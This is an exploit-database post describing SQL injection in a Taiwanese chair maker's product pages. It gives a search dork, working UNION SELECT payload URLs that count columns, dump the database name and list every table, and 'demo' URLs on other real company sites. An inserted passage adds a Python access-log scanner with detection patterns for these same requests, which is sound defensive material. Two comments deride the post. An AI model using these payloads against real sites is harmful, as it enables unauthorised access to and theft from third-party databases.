CHUENG SHINE CO SQL Injection Vulnerability

2019.06.10
B14ck_Dz (DZ)
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Title : SQL INJECTION Vulnerability
# Author : B14ck_Dz { N00b *-* }
# Tested On : Backbox (Linux)
# Dork : inurl:"product.php?id="

[+] Vulnerable URL : http://www.cschair.com.tw/products.php?TypeID=[id]&CateID=&ID=[id]

Let Us Try on This Vulnerable URL ===>

[*] E.X : http://www.cschair.com.tw/productsinfo.php?TypeID=1&CateID=&ID=48

[!] Number of Columns : 16 ===>
( http://www.cschair.com.tw/productsinfo.php?TypeID=1&CateID=&ID=48 order by 16 )

[!] Vulnerable Record : (9,10,11) ===>
( http://www.cschair.com.tw/productsinfo.php?TypeID=1&CateID=&ID=-48 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 )

[!] Dumping Database Name : ===>
( http://www.cschair.com.tw/productsinfo.php?TypeID=1&CateID=&ID=-48 union select 1,2,3,4,5,6,7,8,CONCAT_WS(0x203a20,DATABASE()),10,11,12,13,14,15,16 )

[!] Dumping All the Tables in the DATABASE Using {HACKBAR} :
( http://www.cschair.com.tw/productsinfo.php?TypeID=1&CateID=&ID=-48 union select 1,2,3,4,5,6,7,8,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x),10,11,12,13,14,15,16 )

[+] Demo :
[*] http://www.cschair.com.tw/productsinfo.php?TypeID=5&CateID=&ID=93
[*] http://www.ampak.com.tw/product.php?id=21
[*] http://www.microtek.com/products.php?KindID=6&ID=1
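A defender-side check for the request shapes listed above, as an added example that is not part of the original advisory: it flags access-log lines where one of the numeric parameters carries non-numeric input or the ORDER BY, UNION SELECT or INFORMATION_SCHEMA patterns. The log lines, client addresses and function names are constructed for illustration, and a combined-style access log is assumed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Query parameters the advisory's URLs use as numeric identifiers.
NUMERIC_PARAMS = {"typeid", "cateid", "kindid", "id"}

# Request shapes from the advisory: column-count probe, UNION read, schema listing.
SIGNATURES = [
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("schema-enum", re.compile(r"information_schema", re.I)),
]

# Lazy match so a request target logged with raw spaces is still captured.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')

def classify(log_line):
    """Return sorted finding labels for one access-log line ([] if clean)."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    findings = set()
    # parse_qsl percent-decodes values and drops blank ones such as CateID=.
    for name, value in parse_qsl(urlsplit(m.group(1)).query):
        if name.lower() not in NUMERIC_PARAMS:
            continue
        if not re.fullmatch(r"[0-9]+", value):
            findings.add("non-numeric-id")
        findings.update(label for label, rx in SIGNATURES if rx.search(value))
    return sorted(findings)

def scan(lines):
    """Return (client_ip, findings) for every line with at least one finding."""
    hits = [(line.split(" ", 1)[0], classify(line)) for line in lines]
    return [(ip, found) for ip, found in hits if found]

# Constructed sample log lines (documentation-range addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Jun/2019:10:00:01 +0100] "GET /productsinfo.php?TypeID=1&CateID=&ID=48 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [10/Jun/2019:10:00:05 +0100] "GET /productsinfo.php?TypeID=1&CateID=&ID=48%20order%20by%2016 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [10/Jun/2019:10:00:09 +0100] "GET /productsinfo.php?TypeID=1&CateID=&ID=-48+union+select+1,2,3 HTTP/1.1" 200 4890',
    '198.51.100.4 - - [10/Jun/2019:10:02:00 +0100] "GET /product.php?id=21 order by 5 HTTP/1.1" 400 0',
]

if __name__ == "__main__":
    for ip, found in scan(SAMPLE_LOG):
        print(ip, ", ".join(found))
```

The check only surfaces probing in logs; the fix belongs in the application, which should cast these parameters to integers or bind them in a prepared statement.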


dj3bb4ran0n | Date: 2019-06-10 10:01 CET+1
Look for vulnerable scripts, for example {designed by ...}; don't just make a dork and post it. It is completely meaningless. I don't know why the admin accepted it.
walid | Date: 2019-06-11 17:33 CET+1
warning: it's bkz here

Copyright 2025, cxsecurity.com

 
